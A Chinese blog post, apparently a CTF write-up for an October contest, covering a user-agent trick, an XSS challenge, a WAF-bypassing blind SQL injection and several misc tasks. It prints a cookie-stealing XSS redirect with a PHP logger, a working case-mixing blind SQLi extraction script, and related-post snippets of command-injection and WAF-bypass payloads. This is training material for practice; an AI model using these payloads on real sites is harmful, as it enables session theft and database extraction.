十月安恒杯 writeup

最新推荐文章于 2021-07-10 22:21:12 发布
最新推荐文章于 2021-07-10 22:21:12 发布
阅读量5.5k 收藏 2
点赞数
分类专栏: I am Assassin
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35078631/article/details/78238523
版权

总结说会的正题不难,不会的实在是难的可以…

web1 iphone6

直接将user-agent改成手机的就可以了,很简单不截图

web2 jshunt

这个题目我没有调出来来,但是明显就是xss,很困惑。
首先扫描了一下目录发现了tmp目录和up目录。up目录明显就是我们上传的jpg文件,有文件类型限制,但是没有 MIME检查,写入后是base64加密后的内容。而tmp内容更是直截了当,可以构造<html><script src=></script></html>这样的,貌似没有同源检查,我的思路是上传js内容到jpg文件中,然后让tmp的html文件调用。但是我用国外服务器x不到?用国内网站x不到???自己在本地谢了一个脚本还是x不到???然后我就迷了…
最后发现我犯了一个及其2逼的问题<script>标签引用的只能是js,而不是html(因为原来的html用的实在是太多了…)最后是我的编码的问题…哭晕,本地搭载了一下
flag.php

<?php
if(@$_GET['cookie']){
    $myfile = fopen("./1.txt", "a+");
    fwrite($myfile, $_GET['cookie']."\n");
    fclose($myfile);
}
?>

test.html

<html><script src=wamp.html></script></html>

wamp.html(就是在这里犯得二)

window.location.href="http://127.0.0.1/flag.php?cookie="+document.cookie

web3 绕过看门狗

非常简单的注入,需要大小写绕过而已,其他都可以绕过了。直接上脚本吧,比sqlmap好用感觉

#_*_coding:utf-8_*_
import hashlib 
import re,requests
url = 'http://192.168.5.13/viewld.do?ldid=2%20aNd%20'
temp=0
def pre(string,pos,l,r):
    global temp
    if l>r: 
        return 
    mid=(l+r)/2
    tempurl=url+'(seLect asCii(suBstr(('+string+') fROm '+str(pos)+' fOr 1))<='+str(mid)+')'
    #print tempurl
    html = requests.get(tempurl).text
    #print html,len(html)
    if len(html)>1200:
        flag=1
        temp=mid
        temp=max(temp,mid)
        pre(string,pos,l,mid-1)
    else :
        pre(string,pos,mid+1,r)
flag=''
def work(str):
    global temp
    global flag
    for l in range(1,50):
        temp=0
        pre(str,l,30,130)
        if temp>0 and temp !=30:
            flag+=chr(temp)
            print flag
        else :
            break
#insert="seLect database()"  news

#insert="SELeCT SCHEma_NaME FRoM infOrmation_schEma.SCHEmaTA liMit 1,1"
#insert="SELeCT Table_NaME FRoM infOrmation_schEma.tabLES whEre TAbLE_SChEMA='news' liMit 1,1"
#tb_admin   tb_flag
#insert="SELeCT COLuMN_NaME FRoM infOrmation_schEma.COLuMNS whEre Table_NaME='tb_flag' liMit 0,1"
#flag
insert="SELeCT flag FRoM tb_flag liMit 0,1"
work(insert)
#flag{1396265adbb760c86475304b98e3f61c}

reverse

这个逆向比较困难,我是投机取巧地找到了原题…但是这个题目是一个非常好的题目,是一个算法,算法本身有轮转等工作,而且有可能有多解,非常好的题目,过一段时间会单独复现一下。

Crypto

这个我也是迷了,好难猜啊…作业时密文,然后报纸中替换掉的是密文,根据语境猜测替换表是什么…

这里写图片描述

Misc 1 别劫持的神秘礼物

大水题,直接在tcp流中找到访问页面的包,账号密码就在上面,连起来md5一下就好了。

Misc 2 找webshell

这个题目可是坑死我了…一开始像是既然是上传的文件,我就去找一下上传的节点有什么,发现什么都没有,后来一想人家可能藏到了别的地方,用seayfinder没找到,然后在网上找了一个在线扫描shell的站,但是扫不出来…
下载他的安装包离线扫扫描出来了,在include/include.php下存在一个pass就是flag了,具体他是做什么的还没来得及看,貌似是个大马,只是根据提示做了出来^_^

总结:

我还是太菜了

Assassin__is__me
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络全自学篇] 三十三.文件上传之绕狗一句话原理和绕过全狗(六)
杨秀璋的专栏
12-20 1万+
这是作者的系列网络全自学教程,主要是关于全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了Upload-labs靶场及文件上传漏洞20道CTF题目,并结合Caidao工具介绍拿站的流程及防御原理。本篇文章将介绍绕狗一句话原理、绕过全狗的常用方法和过狗菜刀,并实践全狗进行实际测试。这是文件上传漏洞系列的最后一篇博客,不知道有没有帮助到大家。希望博友们一定要去试试Upload-labs靶场的20道题目。作者作为网络全的小白,分享一些自学基础教程给大家,希望您
WEB狗的各种绕过 —— 【WUST-CTF2020】朴实无华
Ve99tr’s Blog
03-30 4472
web狗的各种绕过:intval函数绕过、双重MD5以及==弱类型、空格过滤绕过
杯-绕过看门狗
weixin_30814329的博客
12-26 1224
1. 输入and 1=1发现非法提示 通过大小写混淆可以绕过 2. 经测试,发现有5个字段 3. 查数据库和当前用户 4. 查表 UniOn SelEct 1,(SelEct Table_Name fROm InfOrMation_sChema.tAbles WhEre tAble_sChema='news' lImit...
乌云峰会:一场白帽子的盛会
weixin_50464560的博客
07-10 752
白色是最纯粹的颜色,没有一丝杂色,哪怕是掉在上面一粒灰点也能立马呈现,所以白色的世界里不允许有半点污点。   昨天,乌云大会分论坛的最后一个环节讨论了近期发生的一件大事——世纪佳缘事件。 来自中科院软件研究所的研究员丁丽萍、江苏省公部网络全专家童瀛、中国互联网协会信用评价中心法律顾问赵占领、知名互联网公司首席全官陈洋、乌云创始人方小顿、乌云核心白帽子张瑞东、TK教主、全牛主编李少鹏参与了该环节的讨论。   大家就白帽子以后如何去做测试,如何才能不逾越法律红线进行了激烈的讨论。
绕过全狗_绕过全狗五步法
weixin_28810909的博客
12-24 697
今天分享绕过全狗的方法,各位帽子兄弟研阅。PS:测试请断网,据说log会上传,哈哈熟悉的页面,没错绕过它,核心方法:Mysql注释绕过环境:001 利用数据回显获取用户信息找出回显字段http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,3)http://127.0.0.1/killdog/dog...
2018-10月逆向题目
10-29
2018年10月月赛逆向题目。
杯pwn1
04-25
"杯pwn1" 本文主要讨论的是杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
2021“·泰山杯”山东省网络全大赛 (1).rar
12-07
2021“·泰山杯”山东省网络全大赛 CTF 真题
杯-misc-附件资源
03-05
杯-misc-附件资源
绕过全狗继续注入的思路
08-30
绕过全狗继续注入的思路。
2017合天全国高校网联赛专题赛--赛前指导练习题web进阶篇Writeup
4ct10n
08-14 4747
趁着放假,再刷一波题目
CTF命令执行与绕过
Rog's Blog
04-12 1418
浅谈CTF中命令执行与绕过的小技巧 一、空格绕过 1.cat<filename shell 2.cat<>filename shell 3.{cat,filename} shell 4.%09 符号 php 5.cat$IFS$9filename cat${IFS}filename shell 二、命令分隔符号 1.ls /;cat filename shell 2.ls /&cat filename shell 3.ls /|cat filename shell 4.%0a p
某变态CTF比赛绕过preg_match
weixin_40267593的博客
12-20 7699
在圈子中看到了有表哥发变态CTF中preg_match绕过的姿势,并没有写绕过的具体原理及方法,本着学习的态度,查了查资料简单复现了一下。 0x00 题目原型是这样的 测试环境 php7.0.12 apache5.3 <?php highlight_file(__FILE__); if(!preg_match('/[0-9,.$&|{_defogps]/is',$_GET['shel...
杯12月月赛
筱阳的博客
12-23 1464
WEB 这次的月赛可以说非常适合我这种菜鸡做了 ezweb2: 请求包中发现一个user=base64 解码得到user,构造admin 然后base64提交 发现跳转到后台admin.php 试了一个ls发现有回显,应该是个命令执行漏洞 构造: cmd = ls$IFS/ 成功回显 然后读取flag: cmd = cat $IFS /ffLAG_404 easy: &lt;?php ...
提权绕过全狗加账户的种种思路。
Yellow,不耶。
02-22 1834
注:个人学习总结心得。 提权时候拿到system权限后,全狗就如同渣渣,不是么?打狗棍法一:system权限下直接执行K狗工具,k掉全狗的防御,   打狗棍法二:上传shift后门,(有可能被拦截)直接复制copy C:\sethc.exe C:\windows\system32\sethc.exe copy C:\windows\system32\sethc.exe C:\window...
STM32 外部看门狗 的使用
mengqingbin5219的博客
03-25 4547
之前项目在设计之初,在STM32F4复位电路增加了MAX809低电平复位芯片(图1)。在样板焊接成功,调试时发现单片机复位引脚一直为低电平,移除MAX809后正常。具体原因,当时没有分析。今天偶然看看到如图2。 网上看到一个说法是:在NRST与复位芯片的引脚之间串入一个电阻 图1 图2 ...
CTF命令执行及绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
在做项目时添加看门狗一个好的办法
kwdecsdn的博客
08-11 4040
由于项目到后来抗干扰实验没有通过,需要加入看门狗,喂狗指令怎么加?加到什么地方比较合适?这是一个很有意思的问题,自己总结下,够后人参考。 目前有两个理论:主程序喂狗论和中断喂狗论;主程序喂狗论最大的依据就是:程序跑飞了但中断不一定会死,因为中断一般都有自己固定的中断向量地址,这个时候中断喂狗就失去了看门狗的意思。而中断喂狗论则认为:(1)只在主程序喂狗,由于中断被无意关断,那么主程序实际就只干傻

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值